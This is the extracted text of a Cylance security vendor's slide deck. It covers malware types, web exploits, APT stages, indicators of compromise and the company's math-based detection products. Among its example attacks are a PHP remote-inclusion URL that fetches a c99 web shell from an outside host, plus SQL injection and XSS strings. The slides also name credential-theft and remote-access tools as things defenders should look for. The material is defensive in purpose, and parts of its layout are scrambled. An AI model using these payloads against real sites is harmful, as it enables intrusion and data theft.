Transcript Mathematical Determination of Good and Bad Leveraging Preventative/ Response Professional Services Cylance Corey White, VP, Professional Services PRESPONSE Professional Services Risk Does Not Equal Threat | Presponse.

Mathematical Determination of
Good and Bad Leveraging
Preventative/ Response Professional Services
Cylance
Corey White,
VP, Professional Services
PRESPONSE Professional Services
Risk Does Not Equal Threat | Presponse Compromise Assessment
Malware - Windows / Linux / OSX (31% didn’t use
malware)
•Dropper/Downloaders – Phishing & Waterholing Malware in
Userspace Zero/Single-day Exploits that lead to…
•Backdoor Trojan RATs – Kernel interactive Service Binaries that
mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)
•BOTNETs – Platforms for MAAS/Subscription Access
•WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)
Hacking - .day Exploits
•
Zero Day
•
•
½ Day
•
•
Vulnerability that is known about but no patches are yet available
Single Day
•
•
Vulnerability that only the developer knows about
Vulnerability that is known about and patches are available but not applied
Forever Day
•
Vulnerability that is known and cannot be patched
Hacking - Web Server/Services Exploits
•
Remote code execution (watch your .htaccess files!)
•
•
register_globals on in PHP | require ($page . ".php");
http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt
SQL injection (watch your user privileges!)
•
AND / OR in SQL $query | $query = "SELECT * FROM users WHERE username
= '' or '1=1'";
http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version),,
•
Cross Site Scripting/XSS (watch your syntax!)
•
Volatile entry in Echo | <?php echo "<p>Your Name <br />"; echo
($_GET[name_1]); ?>
http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>
•
Username enumeration (watch your error messages!)
•
Username guessing | Incorrect logon / password combination
Social Engineering – Access, Behavior, and Authority
Sabotage
•Phishing
•Waterholing
•USB “HoneyDrops” & Other Free
Hardware
•“HelpDesk Operators”
•“Visitors” (Repairmen, Janitors,
Pizza/Flower Delivery, Tailgaters)
Subversion
•
•
Contractors
Employees
Advanced Persistent Threat - Activities
Stage 1 - Compromise
• Social Engineering
Backdoors
•
•
Phishing / Waterholing
Help Desk / Visitors
• Web Site Backdoors
• Reconnaissance
Stage 2 - Exploit
Privilege Escalation
Lateral Movement
User Profile Abuse
Remote Access
Provisioning
• Services
Bypass/Cancellation
•
•
•
•
Stage 3 - Control
• Configuration
Management
• Data Targeting
• Data Exfiltration
• Sabotage
• Subversion
Most commonly seen indicators of data loss:
•Non-standard Packagers (7z, Gz, RAR, PKZIP, etc.)
•Multipart Files of particular sizes (250/500Mb)
•“Recycle”/Recycle Bin Residue
•HTTP 206 Status Codes on Web Servers
•Non-standard File Transfer Services (Filezilla, FTP, WsFTP, etc.)
•Non-standard Reverse/Proxy Services (HUCs, PLINK, NC, SSH, etc.)
Most commonly seen indicators of sabotage:
• Unusual Prefetch / Recent / LNK / Bash binary execution history
• AT / CRON Jobs
• Scripts
• Services Cancellation
• User Profile Authority Changes
Most commonly seen indicators of user profile abuse:
• Multiple user accounts on single computer
• User account on multiple computers
• Service & Administrative account propagation
•
Extranet LDAP/AD account use
•
Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)
•
Local Services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)
Most commonly seen indicators of lateral movement:
•
Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)
•
MSTSC history (.RDP, .BMC)
•
Remote job scheduling (AT, SC, WMIC, SSH)
•
Redundant & non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PUTTY, PSEXEC, *FTP, SCP)
•
Domain Services history (DSGET, DSQUERY, HYENA)
•
Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)
Most commonly seen indicators of insider threats:
•Unusual profile access and use history
• Time
• HostID
• Application History
• Configuration History
•RBAC violations
•Other Acceptable Use Policy violations
•Malware / PUP / PUM…
Most common malware identifiers:
•Authority – service, administrator, or user
•Persistence – only 4 persistence mechanisms in Windows
•Communications – only 44 netsvcs keys in Windows Services
•Functionality – user and kernel combinations are rare
•File System – user or system
Risk Does Not Equal Threat | Presponse Compromise Assessment
Issues Not
Indicators
Focus on Priorities
Get Ahead of Compromise Activities
•
Monitor
–
–
•
Alert
–
–
–
–
–
–
•
Persistence settings: registry keys, startup folders,
scheduled jobs/tasks
Service creations
User Profile Propagation
Lateral Movement/Access
Anomalous Use (time/resources)
Service State Changes (start/stop)
File creations by type (RAR, BAT, VBS, SH, etc.)
Sinkhole Communications
Prevent
–
–
–
–
Prevent
Assess and Secure Networks & Applications
Automated Tasks
Known PUP/PUMs
User-space Execution
Victimization
EMAIL
SOCIAL
ENGINEERING
WEB
SUPPLY CHAIN
CANDY DROP
INSIDER
TCP/135
DIRECT
OPEN PORTS
Innovation Requires
STARVATION
WARNING: Deprogramming Required
NO
Signatures
NO
Heuristics
NO
Behavioral
NO
Sandboxing
NO
Dynamic
Detonation
JUST 100% Pure MATH
NO
MicroVirtualization
MALICIOUS
GOOD
100% Pure Math
GAP (60%+)
Blacklist
20%
UNKNOWN
Whitelist
20%
“THE GREYLIST”
Antivirus / HIPS
Servers
AV
Behavioral Analysis
Email / Web
Gateway
Firewall
Sandboxing
IDS/IPS
Whitelisting
Trust
Trust
the Vendor
the Math
Infinity
Product Portfolio
DETECT
SWEEP*
•
•
•
•
Free, Silent
REST API over SSL
Advanced Threat
Over 5,000 seats
•
•
•
•
V-API
V-Forensics
V-Gateway
V-Helpdesk
• Windows Agent
• Cloud management
• Silent / small footprint
• Browser delivery
• Detection of threats
• Silent / small footprint
Detection
Detection only
Detection only
Detection and Protection
with Protection option
JUNE 2013
OCTOBER 2013
FEBRUARY 2014
APRIL 2014